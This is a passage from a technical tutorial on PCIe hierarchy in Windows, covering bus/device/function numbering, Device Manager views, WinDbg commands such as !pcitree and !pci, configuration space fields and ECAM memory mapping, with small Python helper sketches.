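    return (rid >> 8) & 0xFF, (rid >> 3) & 0x1F, rid & 0x7


def format_bdf(bus: int, device: int, function: int) -> str:
    """Render a BDF in the common bb:dd.f hexadecimal notation."""
    return f"{bus:02x}:{device:02x}.{function:x}"


if __name__ == "__main__":
    rid = pack_bdf(0, 2, 0)          # bus 0, device 2, function 0
    print(hex(rid))                  # 0x10
    print(unpack_bdf(rid))           # (0, 2, 0)
    print(format_bdf(1, 0, 1))       # 01:00.1
```

The field widths also explain the limits you will run into: at most 256 buses, 32 devices per bus, and 8 functions per device.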

Because these are all on the top level of the hierarchy, we will give this “bus” a numerical identifier: it will be “Bus 0”, or the Root Bus. We can verify that all of these devices are Bus 0 devices by right-clicking a top level device, selecting Properties, and looking at Location:

This integrated graphics device is located at a BDF of 0:2.0. It is on Bus 0 (the Root Bus), with a device id of 2 and a function id of 0. A “device” in this case represents a physical device, such as a graphics card. A “function” is a distinct capability that the physical device exposes to the system. It can, for all intents and purposes, be thought of as a separate entity. A device which exposes more than one function is aptly known as a Multi-Function Device (MFD). That means it exposes two or more PCI connections to the system while only physically being one device. We will look at an example of a real MFD soon.

An astute reader will notice that we have already broken the “rule” I noted above: there are many devices connected to this singular Bus 0. This is the first exception to the “point-to-point” rule in PCIe and is only allowed in this case because Bus 0 is physically located on the silicon of the CPU. That is, there are no electrical traces between these devices; it is an imaginary connection. All of these devices exist inside the CPU package and are routed using the extremely high speed electrical interconnects within it. These processor interconnects use an internal protocol that is specific to the vendor of the CPU and is not publicly documented; however, we still communicate with it in the ‘language’ of PCIe. These endpoints (labelled in green), due to their special nature, are given a special name: Root Complex Integrated Endpoints (RCIE), because they are integrated directly on the Root Complex.

This shouldn’t come as a surprise: you would expect that devices such as the integrated UHD graphics would be physically located on the CPU (as it is part of the specifications of the CPU). But we can learn about some more interesting topology of the system by observing other RCIEs, such as the fact that the RAM controller is also present here (the silicon which talks to the DRAM DIMMs of memory) and the USB controller (the silicon which talks to external USB devices). This is why certain CPUs only support certain kinds of RAM and USB specifications: the devices which communicate are physically located on the CPU and only support the specification they were physically created to support.

UPDATE: This statement is incorrect. Some IO controllers can still be found on a discrete chip called the PCH (Intel) or also known as the chipset (AMD) which is nearby the CPU and has a high speed link that makes it seem like it is integrated into the CPU silicon. The above sentence incorrectly says that you can find the USB controller on the physical CPU, where it is more likely to be on the “chipset”. However, the memory controller that talks to RAM is found on the CPU die for speed purposes.

This diagram is a minimized version of the first level of the hierarchy, but now let’s build the rest of the hierarchy by expanding the rest of the Root Ports in the device manager.

And here’s what the filled in graph looks like:

Note: I have marked the BDF of the UHD Graphics device and Bus 0.

These root ports are physically located on the CPU, but the devices attached to them are not. There are 3 devices connected to the external PCIe slots on this machine: an NVIDIA Quadro P400 graphics card and two NVMe drives. By going to the properties of each of these in Device Manager, we can pull and update their BDF information in the visual:

Underneath each of the root ports, we can see a device is physically connected. But we can also see that a new Bus has been exposed under each. The Root Port has acted as a Bridge: it has bridged us from Bus 0 into a new bus, so the new bus must be assigned a new numerical ID, and all of the devices/functions underneath that port will inherit that new bus number. This is the same logic utilized by the OS/Firmware when enumerating buses during boot: all bridges and switches expose a new bus which must be assigned a new bus ID number.
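
As a rough illustration of that numbering logic, the sketch below walks a toy topology depth-first and hands out the next unused bus number every time it crosses a bridge. The topology, the `behind` key, and the function name are all hypothetical, and real enumeration does more work than this (for example, programming each bridge with the range of buses behind it).

```python
from itertools import count

# Hypothetical toy topology: "behind" marks a bridge and lists what sits on its new bus.
TOPOLOGY = [
    {"name": "UHD Graphics"},
    {"name": "Root Port A", "behind": [
        {"name": "Quadro P400 graphics"},
        {"name": "Quadro P400 audio"},
    ]},
    {"name": "Root Port B", "behind": [
        {"name": "Bridge", "behind": [{"name": "NVMe drive"}]},
    ]},
    {"name": "Root Port C", "behind": []},
]


def assign_bus_numbers(devices, bus=0, counter=None, out=None):
    """Depth-first walk: every bridge we cross gets the next unused bus number."""
    if counter is None:
        counter = count(1)   # bus 0 is the root bus, so new buses start at 1
    if out is None:
        out = []
    for dev in devices:
        out.append((bus, dev["name"]))
        if "behind" in dev:  # a bridge or root port exposes a new bus
            assign_bus_numbers(dev["behind"], next(counter), counter, out)
    return out


if __name__ == "__main__":
    for bus, name in assign_bus_numbers(TOPOLOGY):
        print(f"Bus {bus}: {name}")
```

Note how the bridge behind Root Port B is numbered before Root Port C is even looked at, which is why nested buses end up with consecutive numbers.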

In this case, we can also see a good example of a Multi-Function Device. The Quadro P400 graphics card is acting as an MFD with two functions. The first function is 0 (BDF 01:00.0) and is the graphics card device itself. The second function is 1 (BDF 01:00.1) and it is the audio controller that allows audio to be played out of ports such as HDMI. These two functions are distinct: they serve entirely different purposes and have separate drivers and configuration associated with them, but they are still implemented by the same physical device, which is device 0, and are located on the same bus, which is bus 1. This is consistent with the point-to-point rule of PCIe: only one physical device can be connected to a link, therefore only one physical device can exist on the bus (other than the exception, bus 0).

Exploring PCIe hierarchy and devices from WinDbg

So far we’ve seen a standard PCI bus hierarchy by using Device Manager’s “View by Connection” functionality. There is another more detailed way to investigate a PCIe hierarchy: using the trusty kernel debug extensions provided by WinDbg.

NOTE: It is assumed that you understand how to set up a kernel debugger on a machine to continue following along. If you do not, please refer to the guide provided by Microsoft: Set up KDNET. You can also use LiveKD for most exercises.

I have connected to a new test machine different than the one used above. We will walk through the process of graphing the hierarchy of this machine using the output of the debugger. We will also learn how to investigate information about the device through its configuration memory.

Once dropped into a debugger, we will start by using the !pcitree command. This will dump a textual tree diagram of the PCI devices enumerated on the system.

8: kd> !pcitree
Bus 0x0 (FDO Ext ffffdc89b9f75920)
  (d=0,  f=0) 80866f00 devext 0xffffdc89b0759270 devstack 0xffffdc89b0759120 0600 Bridge/HOST to PCI
  (d=1,  f=0) 80866f02 devext 0xffffdc89ba0c74c0 devstack 0xffffdc89ba0c7370 0604 Bridge/PCI to PCI
  Bus 0x1 (FDO Ext ffffdc89ba0aa190)
    No devices have been enumerated on this bus.
  (d=2,  f=0) 80866f04 devext 0xffffdc89ba0c94c0 devstack 0xffffdc89ba0c9370 0604 Bridge/PCI to PCI
  Bus 0x2 (FDO Ext ffffdc89ba0a8190)
    (d=0,  f=0) 10de13bb devext 0xffffdc89ba04f270 devstack 0xffffdc89ba04f120 0300 Display Controller/VGA
    (d=0,  f=1) 10de0fbc devext 0xffffdc89ba051270 devstack 0xffffdc89ba051120 0403 Multimedia Device/Unknown Sub Class
  (d=3,  f=0) 80866f08 devext 0xffffdc89ba0cb4c0 devstack 0xffffdc89ba0cb370 0604 Bridge/PCI to PCI
  Bus 0x3 (FDO Ext ffffdc89ba08f190)
    No devices have been enumerated on this bus.
  (d=5,  f=0) 80866f28 devext 0xffffdc89ba0cd4c0 devstack 0xffffdc89ba0cd370 0880 Base System Device/'Other' base system device
  (d=5,  f=1) 80866f29 devext 0xffffdc89ba0cf4c0 devstack 0xffffdc89ba0cf370 0880 Base System Device/'Other' base system device
  (d=5,  f=2) 80866f2a devext 0xffffdc89ba0d14c0 devstack 0xffffdc89ba0d1370 0880 Base System Device/'Other' base system device
  (d=5,  f=4) 80866f2c devext 0xffffdc89ba0d34c0 devstack 0xffffdc89ba0d3370 0800 Base System Device/Interrupt Controller
  (d=11, f=0) 80868d7c devext 0xffffdc89ba0d84c0 devstack 0xffffdc89ba0d8370 ff00 (Explicitly) Undefined/Unknown Sub Class
  (d=11, f=4) 80868d62 devext 0xffffdc89ba0da4c0 devstack 0xffffdc89ba0da370 0106 Mass Storage Controller/Unknown Sub Class
  (d=14, f=0) 80868d31 devext 0xffffdc89ba0dc4c0 devstack 0xffffdc89ba0dc370 0c03 Serial Bus Controller/USB
  (d=16, f=0) 80868d3a devext 0xffffdc89ba0de4c0 devstack 0xffffdc89ba0de370 0780 Simple Serial Communications Controller/'Other'
  (d=16, f=3) 80868d3d devext 0xffffdc89ba0e04c0 devstack 0xffffdc89ba0e0370 0700 Simple Serial Communications Controller/Serial Port
  (d=19, f=0) 808615a0 devext 0xffffdc89ba0e24c0 devstack 0xffffdc89ba0e2370 0200 Network Controller/Ethernet
  (d=1a, f=0) 80868d2d devext 0xffffdc89ba0e44c0 devstack 0xffffdc89ba0e4370 0c03 Serial Bus Controller/USB
  (d=1b, f=0) 80868d20 devext 0xffffdc89ba0254c0 devstack 0xffffdc89ba025370 0403 Multimedia Device/Unknown Sub Class
  (d=1c, f=0) 80868d10 devext 0xffffdc89ba0274c0 devstack 0xffffdc89ba027370 0604 Bridge/PCI to PCI
  Bus 0x4 (FDO Ext ffffdc89ba0a9190)
    No devices have been enumerated on this bus.
  (d=1c, f=1) 80868d12 devext 0xffffdc89ba02c4c0 devstack 0xffffdc89ba02c370 0604 Bridge/PCI to PCI
  Bus 0x5 (FDO Ext ffffdc89b9fe6190)
    No devices have been enumerated on this bus.
  (d=1c, f=3) 80868d16 devext 0xffffdc89ba02e4c0 devstack 0xffffdc89ba02e370 0604 Bridge/PCI to PCI
  Bus 0x6 (FDO Ext ffffdc89ba0a7190)
    (d=0,  f=0) 12838893 devext 0xffffdc89ba062270 devstack 0xffffdc89ba062120 0604 Bridge/PCI to PCI
    Bus 0x7 (FDO Ext ffffdc89ba064250)
      No devices have been enumerated on this bus.
  (d=1c, f=4) 80868d18 devext 0xffffdc89ba0304c0 devstack 0xffffdc89ba030370 0604 Bridge/PCI to PCI
  Bus 0x8 (FDO Ext ffffdc89ba0b2190)
    No devices have been enumerated on this bus.
  (d=1d, f=0) 80868d26 devext 0xffffdc89ba0364c0 devstack 0xffffdc89ba036370 0c03 Serial Bus Controller/USB
  (d=1f, f=0) 80868d44 devext 0xffffdc89ba0384c0 devstack 0xffffdc89ba038370 0601 Bridge/PCI to ISA
  (d=1f, f=2) 80868d02 devext 0xffffdc89ba03a4c0 devstack 0xffffdc89ba03a370 0106 Mass Storage Controller/Unknown Sub Class
  (d=1f, f=3) 80868d22 devext 0xffffdc89ba03c4c0 devstack 0xffffdc89ba03c370 0c05 Serial Bus Controller/Unknown Sub Class

NOTE: If you have an error Error retrieving address of PciFdoExtensionListHead, make sure your symbols are set up correctly and run .reload pci.sys to reload PCI’s symbols.

When presented with this output, it might be difficult to visually see the “tree” due to the way the whitespace is formatted. The way to interpret this output is to look at the indentation of the Bus 0x text. Anything indented one set of spaces further than the Bus 0x line is a device on that bus. We can see there are also other Bus 0x lines directly underneath a device. That means that the device above the Bus 0x line is exposing a new bus to us, and the bus number is given there.
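
If reading the indentation by eye gets tedious, the same rule can be applied mechanically. The following is only a sketch that assumes the output format shown above (two spaces of indentation per level, hexadecimal device and function numbers); the function name and regular expressions are my own and not part of WinDbg.

```python
import re

# A few lines copied from the !pcitree output above.
SAMPLE = """\
Bus 0x0 (FDO Ext ffffdc89b9f75920)
  (d=1,  f=0) 80866f02 devext 0xffffdc89ba0c74c0 devstack 0xffffdc89ba0c7370 0604 Bridge/PCI to PCI
  Bus 0x1 (FDO Ext ffffdc89ba0aa190)
    No devices have been enumerated on this bus.
  (d=2,  f=0) 80866f04 devext 0xffffdc89ba0c94c0 devstack 0xffffdc89ba0c9370 0604 Bridge/PCI to PCI
  Bus 0x2 (FDO Ext ffffdc89ba0a8190)
    (d=0,  f=0) 10de13bb devext 0xffffdc89ba04f270 devstack 0xffffdc89ba04f120 0300 Display Controller/VGA
    (d=0,  f=1) 10de0fbc devext 0xffffdc89ba051270 devstack 0xffffdc89ba051120 0403 Multimedia Device/Unknown Sub Class
"""

BUS_RE = re.compile(r"^(\s*)Bus 0x([0-9a-fA-F]+)")
DEV_RE = re.compile(
    r"^(\s*)\(d=([0-9a-fA-F]+),\s*f=([0-9a-fA-F]+)\)\s+([0-9a-fA-F]{8})"
    r"\s+devext\s+\S+\s+devstack\s+\S+\s+([0-9a-fA-F]{4})\s+(.*)$"
)


def parse_pcitree(text):
    """Return (bus, device, function, id, class_code, description) per device line."""
    stack = []    # (indent, bus number) of every enclosing "Bus 0x.." line
    devices = []
    for line in text.splitlines():
        bus_match = BUS_RE.match(line)
        dev_match = DEV_RE.match(line)
        match = bus_match or dev_match
        if not match:
            continue  # e.g. "No devices have been enumerated on this bus."
        indent = len(match.group(1))
        # Drop any bus that is indented at least as far as this line: we have left it.
        while stack and stack[-1][0] >= indent:
            stack.pop()
        if bus_match:
            stack.append((indent, int(bus_match.group(2), 16)))
        elif stack:
            bus = stack[-1][1]
            dev, func = int(dev_match.group(2), 16), int(dev_match.group(3), 16)
            devices.append((bus, dev, func, dev_match.group(4),
                            dev_match.group(5), dev_match.group(6)))
    return devices


if __name__ == "__main__":
    for bus, dev, func, ident, class_code, desc in parse_pcitree(SAMPLE):
        print(f"{bus:02x}:{dev:02x}.{func:x}  {ident}  {class_code}  {desc}")
```

The stack is what makes nested buses work: a device line always belongs to the nearest `Bus 0x` line above it that is indented less than the device itself.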

Let’s take a look at a specific portion of this output:

Bus 0x0 (FDO Ext ffffdc89b9f75920)
  (d=0,  f=0) 80866f00 devext 0xffffdc89b0759270 devstack 0xffffdc89b0759120 0600 Bridge/HOST to PCI
  (d=1,  f=0) 80866f02 devext 0xffffdc89ba0c74c0 devstack 0xffffdc89ba0c7370 0604 Bridge/PCI to PCI
  Bus 0x1 (FDO Ext ffffdc89ba0aa190)
    No devices have been enumerated on this bus.
  (d=2,  f=0) 80866f04 devext 0xffffdc89ba0c94c0 devstack 0xffffdc89ba0c9370 0604 Bridge/PCI to PCI
  Bus 0x2 (FDO Ext ffffdc89ba0a8190)
    (d=0,  f=0) 10de13bb devext 0xffffdc89ba04f270 devstack 0xffffdc89ba04f120 0300 Display Controller/VGA
    (d=0,  f=1) 10de0fbc devext 0xffffdc89ba051270 devstack 0xffffdc89ba051120 0403 Multimedia Device/Unknown Sub Class
  (d=3,  f=0) 80866f08 devext 0xffffdc89ba0cb4c0 devstack 0xffffdc89ba0cb370 0604 Bridge/PCI to PCI
  Bus 0x3 (FDO Ext ffffdc89ba08f190)
    No devices have been enumerated on this bus.

In this output, we can see the BDF displayed of each device. We can also see a set of Root Ports that exist on Bus 0 that do not have any devices enumerated underneath, which means that the slots have not been connected to any devices.

It should be easier to see the tree structure here, but let’s graph it out anyways:

NOTE: It is just a coincidence that the bus numbers happen to match up with the device numbers of the Bridge/PCI to PCI ports.

As you now know, the devices labelled as Bridge/PCI to PCI are in fact Root Ports, and the device on Bus 2 is in fact a Multi-Function Device. Unlike the device manager, we don’t see the true name of the device from !pcitree. Instead, we are just given a generic PCI name for what “type” the device advertises itself as. This is because Device Manager is reading the name of the device from the driver and not directly from PCI.

To see more about what this Display Controller device is, we can use the command !devext [pointer], where [pointer] is the value directly after the word devext in the layout. In this case, it is:

(d=0,  f=0) 10de13bb devext 0xffffdc89ba04f270 devstack 0xffffdc89ba04f120 0300 Display Controller/VGA

!devext 0xffffdc89ba04f270

From here, we will get a printout of a summary of this PCI device as seen from the PCI bus driver in Windows, pci.sys:

8: kd> !devext 0xffffdc89ba04f270
PDO Extension, Bus 0x2, Device 0, Function 0.
  DevObj 0xffffdc89ba04f120  Parent FDO DevExt 0xffffdc89ba0a8190
  Device State = PciStarted
  Vendor ID 10de (NVIDIA CORPORATION)  Device ID 13BB
  Subsystem Vendor ID 103c (HEWLETT-PACKARD COMPANY)  Subsystem ID 1098
  Header Type 0, Class Base/Sub 03/00  (Display Controller/VGA)
  Programming Interface: 00, Revision: a2, IntPin: 01, RawLine 00
  Possible Decodes ((cmd & 7) = 7): BMI
  Capabilities: Ptr=60, power msi express 
  Express capabilities: (BIOS controlled) 
  Logical Device Power State: D0
  Device Wake Level:          Unspecified
  WaitWakeIrp:                <none>
  Requirements:     Alignment Length    Minimum          Maximum
    BAR0    Mem:    01000000  01000000  0000000000000000 00000000ffffffff
    BAR1    Mem:    10000000  10000000  0000000000000000 ffffffffffffffff
    BAR3    Mem:    02000000  02000000  0000000000000000 ffffffffffffffff
    BAR5     Io:    00000080  00000080  0000000000000000 00000000ffffffff
      ROM BAR:      00080000  00080000  0000000000000000 00000000ffffffff
    VF BAR0 Mem:    00080000  00080000  0000000000000000 00000000ffffffff
  Resources:        Start            Length
    BAR0    Mem:    00000000f2000000 01000000
    BAR1    Mem:    00000000e0000000 10000000
    BAR3    Mem:    00000000f0000000 02000000
    BAR5     Io:    0000000000001000 00000080
  Interrupt Requirement:
    Line Based - Min Vector = 0x0, Max Vector = 0xffffffff
    Message Based: Type - Msi, 0x1 messages requested
  Interrupt Resource:    Type - MSI, 0x1 Messages Granted

There is quite a lot of information here that the kernel knows about this device. This information was retrieved through Configuration Space (abbrev. “config space”), a section of memory on the system which allows the kernel to enumerate, query info, and setup PCI devices in a standardized way. The software reads memory from the device to query information such as the Vendor ID, and the device (if it is powered on) responds back with that information. In the next section, I will discuss more about how this actually takes place, but know that the information queried here was produced from config space.

So let’s break down the important stuff:

DevObj: The pointer to the nt!_DEVICE_OBJECT structure which represents the physical device in the kernel.
Vendor ID: A 16-bit id number which is registered to a particular device manufacturer. This value is standardized, and new vendors must be assigned a unique ID by the PCI-SIG so they do not overlap. In this case, we see this is a NVIDIA graphics card.
Device ID: A 16-bit id number for the particular chip doing PCIe. Similar idea in that a company must request a unique ID for their chip so it doesn’t conflict with any others.
Subsystem Vendor ID: The vendor id of the board the chip sits on. In this case, “HP” is the producer of the graphics card, and “NVIDIA” designed the graphic chip.
Subsystem Device ID: The device id of the board the chip sits on.
Logical Device Power State: The power state of this device. There are two major power states in PCI, D0 = Device is powered on, D3 = Device is in a low-power state, or completely off.
Requirements: The memory requirements the device is asking the OS to allocate for it. More on this later.
Resources: The memory resources assigned to this device by the OS. This device is powered on and started already, so it already has its resources assigned.
Interrupt Requirement/Resource: Same as above, except for interrupts.
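
As a small aside, the 8-digit value that !pcitree printed for each device (for example 10de13bb) lines up with these two fields: judging by the !devext output above, the first four hex digits are the Vendor ID and the last four are the Device ID. A minimal sketch of splitting it, with a hypothetical helper name and a tiny hand-written vendor table:

```python
# Tiny hand-written table for illustration only; the real registry is far larger.
KNOWN_VENDORS = {
    0x10DE: "NVIDIA",
    0x8086: "Intel",
    0x103C: "Hewlett-Packard",
}


def split_pcitree_id(id_hex: str) -> tuple:
    """Split an 8-digit !pcitree ID into (vendor_id, device_id)."""
    value = int(id_hex, 16)
    return value >> 16, value & 0xFFFF


if __name__ == "__main__":
    vendor_id, device_id = split_pcitree_id("10de13bb")
    name = KNOWN_VENDORS.get(vendor_id, "unknown vendor")
    print(f"vendor {vendor_id:04x} ({name}), device {device_id:04x}")
    # vendor 10de (NVIDIA), device 13bb
```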

To actually get the full information about this device, we can use the fantastic tool at PCI Lookup to query the public information about PCI devices registered with the PCI-SIG. Let’s put the information about the device and vendor ID into the box:

And when we search, we get back this:

This tells us the device is a Quadro K620 graphics card created by NVIDIA. The subsystem ID tells us that this particular card PCB was produced by HP, under license from NVIDIA.

What we saw in !devext is a good overview of what pci.sys specifically cares about showing us in the summary, but it only scratches the surface of all of the information in config space. To dump all of the information in configuration space, we can use the extension !pci 100 B D F where BDF is the BDF of our device in question. 100 is a set of flags that specifies that we want to dump all information about the device. The information displayed will be laid out in the order that it exists in the config space of the device. Prefixing each section is an offset, such as 02 for device id. This specifies the offset into config space that this value was read from. These offsets are detailed in the PCI specification and do not change between PCI versions for backwards compatibility purposes.

8: kd> !pci 100 2 0 0

PCI Configuration Space (Segment:0000 Bus:02 Device:00 Function:00)
Common Header:
    00: VendorID       10de Nvidia Corporation
    02: DeviceID       13bb
    04: Command        0507 IOSpaceEn MemSpaceEn BusInitiate SERREn InterruptDis 
    06: Status         0010 CapList 
    08: RevisionID     a2
    09: ProgIF         00 VGA
    0a: SubClass       00 VGA Compatible Controller
    0b: BaseClass      03 Display Controller
    0c: CacheLineSize  0000
    0d: LatencyTimer   00
    0e: HeaderType     80
    0f: BIST           00
    10: BAR0           f2000000
    14: BAR1           e000000c
    18: BAR2           00000000
    1c: BAR3           f000000c
    20: BAR4           00000000
    24: BAR5           00001001
    28: CBCISPtr       00000000
    2c: SubSysVenID    103c
    2e: SubSysID       1098
    30: ROMBAR         00000000
    34: CapPtr         60
    3c: IntLine        00
    3d: IntPin         01
    3e: MinGnt         00
    3f: MaxLat         00
Device Private:
    40: 1098103c 00000000 00000000 00000000
    50: 00000000 00000001 0023d6ce 00000000
    60: 00036801 00000008 00817805 fee001f8
    70: 00000000 00000000 00120010 012c8de1
    80: 00003930 00453d02 11010140 00000000
    90: 00000000 00000000 00000000 00040013
    a0: 00000000 00000006 00000002 00000000
    b0: 00000000 01140009 00000000 00000000
    c0: 00000000 00000000 00000000 00000000
    d0: 00000000 00000000 00000000 00000000
    e0: 00000000 00000000 00000000 00000000
    f0: 00000000 00000000 00000000 00000000
Capabilities:
    60: CapID          01 PwrMgmt Capability
    61: NextPtr        68
    62: PwrMgmtCap     0003 Version=3
    64: PwrMgmtCtrl    0008 DataScale:0 DataSel:0 D0 

    68: CapID          05 MSI Capability
    69: NextPtr        78
    6a: MsgCtrl        64BitCapable MSIEnable MultipleMsgEnable:0 (0x1) MultipleMsgCapable:0 (0x1)
    6c: MsgAddrLow     fee001f8
    70: MsgAddrHi      0
    74: MsgData        0

    78: CapID          10 PCI Express Capability
    79: NextPtr        00
    7a: Express Caps   0012 (ver. 2) Type:LegacyEP
    7c: Device Caps    012c8de1
    80: Device Control 3930 bcre/flr MRR:1K NS ap pf ET MP:256 RO ur fe nf ce
    82: Device Status  0000 tp ap ur fe nf ce
    84: Link Caps      00453d02
    88: Link Control   0140 es CC rl ld RCB:64 ASPM:None 
    8a: Link Status    1101 SCC lt lte NLW:x16 LS:2.5 
    9c: DeviceCaps2    00040013 CTR:3 CTDIS arifwd aor aoc32 aoc64 cas128 noro ltr TPH:0 OBFF:1 extfmt eetlp EETLPMax:0
    a0: DeviceControl2 0000 CTVal:0 ctdis arifwd aor aoeb idoreq idocom ltr OBFF:0 eetlp

Enhanced Capabilities:
    100: CapID         0002 Virtual Channel Capability
         Version       1
         NextPtr       258
    0104: Port VC Capability 1        00000000
    0108: Port VC Capability 2        00000000
    010c: Port VC Control             0000
    010e: Port VC Status              0000
    0110: VC Resource[0] Cap          00000000
    0114: VC Resource[0] Control      800000ff
    011a: VC Resource[0] Status       0000

    258: CapID         001e L1 PM SS Capability
         Version       1
         NextPtr       128
    25c: Capabilities  0028ff1f  PTPOV:5 PTPOS:0 PCMRT:255 L1PMS ASPML11 ASPML12 PCIPML11 PCIPML12
    260: Control1      00000000  LTRL12TS:0 LTRL12TV:0 CMRT:0 aspml11 aspml12 pcipml11 pcipml12
    264: Control2      00000028  TPOV:5 TPOS:0

    128: CapID         0004 Power Budgeting Capability
         Version       1
         NextPtr       600

    600: CapID         000b Vendor Specific Capability
         Version       1
         NextPtr       000
         Vendor Specific ID 0001 - Ver. 1  Length: 024

The nice thing about this view is that we can see detailed information about the Capabilities section of config space. Capabilities is a set of structures within the config space that describes exactly what features the device is capable of. Capabilities includes information such as link speed and what kinds of interrupts the device supports. Any new features added to the PCI specification will be advertised through these structures, and the structures form a linked list of capabilities in config space that can be iterated through to discover all capabilities of the device. Not all of these capabilities are relevant to the OS; some are relevant only to aspects of hardware not covered by this post. For now, I won’t go into any further details of the capabilities of this device.
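
To show what “iterating the linked list” means in practice, here is a minimal sketch that rebuilds part of this device’s config space from the raw dwords in the dump above and follows the pointers by hand. It only covers the classic capability list in the first 256 bytes (the Enhanced Capabilities starting at offset 0x100 use a different header format), and the function names are my own.

```python
import struct

# Raw dwords copied from the "Device Private" rows of the dump above.
ROWS = {
    0x60: (0x00036801, 0x00000008, 0x00817805, 0xFEE001F8),
    0x70: (0x00000000, 0x00000000, 0x00120010, 0x012C8DE1),
    0x80: (0x00003930, 0x00453D02, 0x11010140, 0x00000000),
}

CAP_NAMES = {0x01: "Power Management", 0x05: "MSI", 0x10: "PCI Express"}


def build_config_space() -> bytearray:
    """Recreate just enough of the 256-byte config space to walk the list."""
    cfg = bytearray(256)
    struct.pack_into("<H", cfg, 0x06, 0x0010)   # Status: CapList bit set
    cfg[0x34] = 0x60                            # CapPtr from the dump
    for offset, dwords in ROWS.items():
        struct.pack_into("<4I", cfg, offset, *dwords)
    return cfg


def walk_capabilities(cfg) -> list:
    """Follow CapPtr -> NextPtr -> ... and return (offset, capability id) pairs."""
    status = struct.unpack_from("<H", cfg, 0x06)[0]
    if not (status & 0x10):          # no capability list advertised
        return []
    caps, seen = [], set()
    ptr = cfg[0x34] & 0xFC           # the low two bits of a pointer are reserved
    while ptr and ptr not in seen:   # a NextPtr of 00 ends the list
        seen.add(ptr)
        caps.append((ptr, cfg[ptr]))
        ptr = cfg[ptr + 1] & 0xFC
    return caps


if __name__ == "__main__":
    for offset, cap_id in walk_capabilities(build_config_space()):
        print(f"{offset:02x}: CapID {cap_id:02x} {CAP_NAMES.get(cap_id, 'unknown')}")
```

The offsets and IDs it finds (60, 68, 78) match the CapID and NextPtr lines in the Capabilities section that !pci printed.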

PCIe: It’s all about memory

So now that we’ve investigated a few devices and the hierarchy of a PCI bus, let’s talk about how the communication with software and PCI devices actually works. When I was first learning about PCI, I had a lot of trouble understanding what exactly was happening when software interfaces with a PCI device. Because the entire transaction is abstracted away from you as the software developer, it’s hard to build the mental model of what’s going on by just poking at PCI memory from a debugging tool. Hopefully this writeup will provide a better overview than what I was able to get when I was first starting out.

First off I will make a bold statement: All modern PCIe communication is done through memory reads and writes. If you understand how memory in PCIe works, you will understand how PCIe software communication works. (Yes, there are other legacy ways to communicate on certain platforms, but we will not discuss those because they are deprecated.)

Now, let’s talk about different types of memory on a modern platform. From very early in boot, the CPU will be using virtual memory. That is, the memory addresses seen by software running on the CPU are a view that is mapped onto the world of physical memory.

For our purposes, there are two types of physical memory on a system:

RAM - Addresses that, when read or written, store and retrieve data in the DRAM DIMMs on your machine. This is what most people think of when they think “memory”.
Device Memory - Addresses that, when read or written, talk to a device on the system. The keyword here is talk. An access does not store memory on the device and does not retrieve memory from the device (although the device might be able to do both). The address you are talking to might not even be memory at all, but a more ethereal “device register” that configures the inner workings of the device. It is up to the device what happens with this kind of access. All you are doing is communicating with a device. You will typically see this referred to as MMIO, which stands for Memory-Mapped I/O.

NOTE: Device memory for PCI will always read “all 1s” or “all FFs” whenever a device does not respond to the address accessed in a device memory region. This is a handy way to know when a device is actually responding or not. If you see all FFs, you know you’re reading invalid device addresses.

It is a common beginner misunderstanding that all physical memory is RAM. When software talks to a PCI device in the PCI region, it is not reading and writing from RAM. The device instead is receiving a packet (a TLP, Transaction Layer Packet) from the Root Complex that is automatically generated for you by your CPU immediately when the address inside the PCI region is read/written. You do not create these packets in software, and all of these packets are generated completely behind the scenes as soon as this memory is accessed. In software, you cannot even see or capture these packets; doing so requires a special hardware testing device to intercept and view the packets being sent. More on this later.

If it helps, think of physical memory instead as a mapping of devices. RAM is a device which is mapped into physical memory for you. PCI also has regions mapped automatically for you. Though they are distinct and act very differently, they look the same to software.

In the following diagram, we can see how a typical system is mapping virtual memory to physical memory. Note that there are two regions of RAM and two regions of PCI memory. This is because certain older PCI devices can only address 32 bits of memory. Therefore, some RAM is moved up above 4GB if your RAM does not fit within the window of addresses under 4GB. Since your processor supports 64-bit addresses, this is not an issue. Additionally, a second window is created above the 4GB line for PCI devices which do support 64-bit addresses. Because the region below 4GB can be very constrained, it is best for devices to move as much memory above 4GB as possible so as not to clutter the space below.

A very simplified view of how ranges of virtual addresses could be mapped to physical addresses. This ignores a large number of "special" regions in physical memory, but showcases how RAM and device memory are not the same.

Let’s talk first about the type of memory we’ve already seen: configuration space.

Configuration space is located in a section of memory called ECAM, which stands for Enhanced Configuration Access Mechanism. Because it is a form of device memory, in order to access this memory from the kernel (which uses virtual memory), the kernel must ask the memory manager to map this physical memory into a virtual address. Then, software instructions can use the virtual address of the mapping to read and write from physical addresses. On Windows, locating and mapping this memory is handled partially by pci.sys, partially by acpi.sys, and partially by the kernel (specifically the HAL).

NOTE: Typically the way device memory is mapped in Windows is through MmMapIoSpaceEx, which is an API drivers can use to map physical device memory. However, in order to do configuration space accesses, software must use HalGetBusDataByOffset and HalSetBusDataByOffset to ensure that the internal state of pci.sys is kept in synchronization with the configuration space reads/writes you are doing. If you try to map and change configuration space yourself, you might desync state from pci.sys and cause a BSOD.

NOTE: Where in physical memory the ECAM/PCI regions are located is platform dependent. The firmware at boot time will assign all special regions of physical memory of the system. The firmware then advertises the location of these regions to the OS during boot time. On x86-64 systems, the ECAM region will be communicated from firmware through ACPI using a table (a structure) called MCFG. It is not important for now to know what specific protocol is used to retrieve this info; just understand that the OS retrieves the addresses of these regions from the firmware, which decided where to put them.

So in order to do a configuration space access, the kernel must map configuration space (ECAM) to virtual memory. This is what such a thing would look like:

A mapping of ECAM to virtual memory. Horribly not to scale.

After this, the kernel is now able to communicate with the configuration space of the device by using the virtual mapping. But what does this configuration space look like? Well, it’s just a bunch of blocks of configuration space structures we talked about above. Each possible BDF a device could have is given space in ECAM to configure it. It is laid out in such a way that the BDF of the device tells you exactly where its configuration space is in ECAM. That is, given a BDF, we can calculate the offset to add to the base of the ECAM region in order to talk to the device because all ECAM regions for each function are the same size.
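
As a rough sketch of that calculation: in the standard ECAM layout every function gets its own 4 KiB block, so the bus number lands in bits 20 and up, the device number in bits 15-19, and the function number in bits 12-14 of the offset. The base address below is a made-up placeholder (not the value from this machine), and the helper names are hypothetical.

```python
EXAMPLE_ECAM_BASE = 0xC0000000   # hypothetical; the real base comes from firmware


def ecam_offset(bus: int, device: int, function: int, register: int = 0) -> int:
    """Offset from the ECAM base of a register in a function's 4 KiB config block."""
    if not (0 <= bus <= 0xFF and 0 <= device <= 0x1F and 0 <= function <= 0x7):
        raise ValueError("bus must be 0-255, device 0-31, function 0-7")
    if not 0 <= register < 0x1000:
        raise ValueError("register offset must fit inside the 4 KiB block")
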